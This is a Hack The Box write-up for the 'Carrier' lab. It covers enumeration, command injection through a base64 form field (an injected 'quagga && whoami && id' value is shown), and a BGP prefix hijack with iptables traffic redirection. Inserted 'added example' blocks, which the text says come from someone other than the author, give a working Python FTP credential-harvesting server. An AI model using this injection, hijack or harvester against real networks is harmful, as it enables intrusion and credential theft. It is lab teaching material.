
Hack The Box - Carrier

 3 years ago
source link: https://www.tuicool.com/articles/hit/BvEJZb7

Quick Summary

Hey guys, today Carrier retired and here is my write-up about it. User on this box wasn't hard to get, but root is a different story, because we will go through some networking tricks and perform an attack called BGP hijacking. The overall experience was great and Carrier was one of the best boxes on this platform. It's a Linux box and its IP is 10.10.10.105; I added it to /etc/hosts as carrier.htb. Let's jump right in!


Nmap

As always we will start by using nmap to scan for open ports and services.

nmap -sV -sT -sC carrier.htb

We get FTP on port 21, SSH on port 22 and HTTP on port 80. Some other boxes had anonymous FTP access allowed, but here it isn't, and the port also shows as filtered, so we are not going to spend time on FTP.

HTTP Initial Enumeration


On HTTP there's a web application called Lyghtspeed and we are asked to log in. Under "Please login" it shows Error 45007 and Error 45009, which is interesting.

The next thing to check is directory enumeration:

gobuster -u http://carrier.htb/ -w /usr/share/wordlists/dirb/common.txt -t 100 -to 200s

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://carrier.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 3m20s
=====================================================
2019/03/15 11:50:56 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/debug (Status: 301)
/doc (Status: 301)
/fonts (Status: 301)
/img (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/tools (Status: 301)

We will only check the interesting ones:

/tools :


It contains a PHP file called remote.php; requesting it:


It only says "License expired, exiting...".

/debug :


It's just a phpinfo page.

/doc :


There's a PDF file and an image. The PDF is called error_codes.pdf, which might be helpful because we saw two error codes on the login page.


Error 45007 is “License invalid or expired”

Error 45009 is “System credentials have not been set. Default admin user password is set (see chassis serial number)”

So now we know we need that chassis serial number to be able to log in, but how do we get it?

More nmap

At this point we suspect there are other services running on the box that we have missed. Before running a full TCP scan we will scan UDP first.

nmap -sU carrier.htb

We get a DHCP server (dhcps) on port 67 and SNMP on port 161. Let's check SNMP.

Snmp Enumeration

SNMP stands for Simple Network Management Protocol. It's an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. You can read more about it here.

We will use a tool called snmpwalk. It's an important tool in SNMP enumeration and can give us a lot of useful information. Read about snmpwalk here.

snmpwalk -c public -v 1 carrier.htb

-c is the community string (public is the common default), -v the SNMP version.


We only get one result: STRING: "SN#NET_45JDX23". Is that the serial number? Let's check:

admin : NET_45JDX23

And it worked.

Exploiting RCE and getting user

Dashboard, Tickets and Diagnostics are available, but Monitoring is disabled. Tickets are not important now, but we will need them later.


Diagnostics has a button saying "Verify status":


After clicking :


Looking at the source we find a hidden field called check (if we intercept the request with Burp we will see it there too). The value of check is the base64 encoding of "quagga":


We can try encoding "root" instead and see what happens:


It gives us a different output :


The output changes with the decoded value, so the server is passing it to a shell. We can confirm remote code execution by sending the base64 encoding of something like "quagga && whoami && id":


We see root, so we can encode a reverse shell payload the same way and get a reverse shell:


But did we really get root on the box? Running ifconfig shows that we are not on the actual host (10.10.10.105) but on a different machine.


Anyway, we owned the user flag!

I also wrote a python script to automate the process of getting a reverse shell , I’ll post it later.

Bgp Hijacking and getting root

We saw "quagga" used in the diagnostics page, but what is Quagga?

Basically, Quagga is a routing software suite (it implements BGP, OSPF and others), and since it is installed on this host, we are most likely meant to perform BGP hijacking (route hijacking). I won't go into a detailed explanation of the attack, since that would be off-topic, but I will include some resources. In simple words, we are going to announce another network's prefix from our router, so that anybody trying to connect to that network ends up connecting to us. This is possible because we have root on a host that is responsible for routing.

Read about quagga

Bgp Hijacking (wikipedia)

Bgp Hijacking (internetsociety.org)

Bgp Hijacking demo

Bgp Hijacking (blogs.akamai.com)

If we take a look at the tickets again, in ticket number 6:


We notice this line: "one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network". So there is an FTP server in 10.120.15.0/24 that somebody logs into regularly. On GitHub there's a Python script called fake_ftp which creates an FTP server that logs the credentials clients send. We can try it locally with test:test:


Now everything is ready: we just need to hijack 10.120.15.0/24, run the fake FTP server on the router and we will capture the credentials. But the script is written for Python 2.7 and this host only has Python 3 installed:


We could fake an FTP server with nc, or edit the script to work with Python 3, but we will do something different: we will add iptables rules on the router that forward traffic arriving on port 21 to port 21 on our box. So the final chain is:

Someone tries to connect to the FTP server -> because of the hijacked prefix they reach the router instead of the server -> iptables forwards that traffic to our box -> our fake FTP server logs the credentials
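For the "edit the script to work with Python 3" option, here is an added example of a minimal Python 3 credential-logging FTP server; it is not the fake_ftp script from GitHub and not the author's code. It speaks just enough FTP to make a client send USER and PASS, writes the pair to log.txt (the file name the write-up watches later), and answers 530 so it never has to serve any files. The vsFTPd-style banner, the log line format and the replay() helper used to exercise the state machine on a recorded transcript are my own choices.

```python
"""Minimal Python 3 credential-logging FTP server (added example; not the
fake_ftp script the write-up uses).  Binding port 21 requires root."""
import socketserver

LOG_FILE = "log.txt"  # file name from the write-up ('watch cat log.txt')


class FtpHarvester:
    """FTP control-channel state machine, kept separate from the socket so it
    can be exercised on a recorded transcript without a network."""
    BANNER = "220 (vsFTPd 3.0.3)\r\n"  # constructed banner, looks like a real server

    def __init__(self):
        self.user = ""
        self.captured = []  # (user, password) pairs seen on this connection

    def handle_line(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.user = arg
            return "331 Please specify the password.\r\n"
        if verb == "PASS":
            # This is the moment the client hands over the secret.
            self.captured.append((self.user, arg))
            # Reject so the client moves on; we do not want to serve files.
            return "530 Login incorrect.\r\n"
        if verb == "QUIT":
            return "221 Goodbye.\r\n"
        return "530 Please login with USER and PASS.\r\n"


class Handler(socketserver.StreamRequestHandler):
    def handle(self):
        fsm = FtpHarvester()
        self.wfile.write(fsm.BANNER.encode())
        logged = 0
        while True:
            raw = self.rfile.readline()
            if not raw:  # client closed the connection
                break
            line = raw.decode(errors="replace")
            self.wfile.write(fsm.handle_line(line).encode())
            # Persist any newly captured credentials immediately.
            for user, password in fsm.captured[logged:]:
                with open(LOG_FILE, "a") as f:
                    f.write(f"{self.client_address[0]} {user}:{password}\n")
            logged = len(fsm.captured)
            if line.strip().upper() == "QUIT":
                break


def replay(transcript):
    """Feed client lines through the state machine; return (replies, captured)."""
    fsm = FtpHarvester()
    replies = [fsm.handle_line(line) for line in transcript]
    return replies, fsm.captured


if __name__ == "__main__":
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(("0.0.0.0", 21), Handler) as srv:
        srv.serve_forever()
```

Run it as root on the box that will receive the FTP traffic, then check with ftp localhost and test:test the way the write-up tests fake_ftp; the entry shows up in log.txt as soon as PASS is received.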

In order to perform the attack we will edit bgpd.conf in /etc/quagga.

Original :


After edits :


The only difference is the added line network 10.120.15.0/25. A /25 is more specific than the legitimate /24, and routers always prefer the longest matching prefix, so every BGP neighbour that accepts our announcement will now send traffic for 10.120.15.0-10.120.15.127 to our router. Note that a single /25 only covers the lower half of the /24; announcing 10.120.15.128/25 as well would cover the whole range.
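To make the longest-prefix-match point concrete, here is an added example (not from the original write-up) that models a routing table with Python's standard ipaddress module and shows which route a destination takes before and after our /25 announcement. The two-entry table and the "legitimate AS" / "our quagga router" labels are constructed for illustration; the prefixes are the ones from the ticket and the config change.

```python
"""Why announcing 10.120.15.0/25 hijacks traffic for 10.120.15.0/24.
Added example, not from the write-up.  Routers select the most specific
matching prefix (longest-prefix match), so a /25 overlapping a legitimate
/24 wins for every address in its half of the range."""
import ipaddress

# Constructed routing table: (prefix, who announced it).
ROUTES = [
    ("10.120.15.0/24", "legitimate AS"),
    ("10.120.16.0/24", "legitimate AS"),
]


def best_route(routes, dst):
    """Longest-prefix match: return (prefix, announcer) for the most specific
    network containing dst, or None if nothing matches."""
    addr = ipaddress.ip_address(dst)
    matches = [(ipaddress.ip_network(p), who) for p, who in routes
               if addr in ipaddress.ip_network(p)]
    if not matches:
        return None
    net, who = max(matches, key=lambda m: m[0].prefixlen)
    return str(net), who


def hijack(routes, prefix, attacker):
    """Table as seen by a neighbour that accepted the attacker's announcement
    (i.e. one with no prefix filtering or RPKI origin validation)."""
    return routes + [(prefix, attacker)]


def covered_by_hijack(victim_prefix, hijack_prefix):
    """Number of addresses of the victim prefix diverted by the announcement."""
    victim = ipaddress.ip_network(victim_prefix)
    hijacked = ipaddress.ip_network(hijack_prefix)
    if not hijacked.subnet_of(victim):
        return 0
    return hijacked.num_addresses


if __name__ == "__main__":
    table = hijack(ROUTES, "10.120.15.0/25", "our quagga router")
    for dst in ("10.120.15.10", "10.120.15.200"):
        print(dst, "->", best_route(table, dst))
    print("addresses diverted:",
          covered_by_hijack("10.120.15.0/24", "10.120.15.0/25"))
```

The second destination, 10.120.15.200, still goes to the legitimate /24: it lies outside the /25 we announced, which is the reason for the caveat above about covering both halves.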

Now we will run a Python simple HTTP server on our box to host the new bgpd.conf:

python -m SimpleHTTPServer 80

Then on the router we delete the old file, download the new config, add the iptables rules and finally restart the service:


iptables commands :

iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.xx.xx:21
iptables -t nat -A POSTROUTING -j MASQUERADE

The first rule rewrites the destination of every TCP connection to port 21 that arrives at the router so that it goes to our box (10.10.xx.xx is our VPN address). The second rewrites the source to the router's own address, so our replies go back through the router instead of straight to the client. This only works because the router already forwards IP traffic (net.ipv4.ip_forward=1); on a plain host the DNATed packets would be dropped.

Then we wait for someone to connect to the fake FTP server.

watch cat log.txt runs cat log.txt every 2 seconds (log.txt is where the captured credentials are stored):


Finally we get these credentials :

root:BGPtelc0rout1ng

Now we can ssh to the actual box as root :


And we owned root!

That's it. Feedback is appreciated!

Don't forget to read the previous write-ups. Tweet about the write-up if you liked it, and follow me on Twitter for awesome resources: @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Ethereal
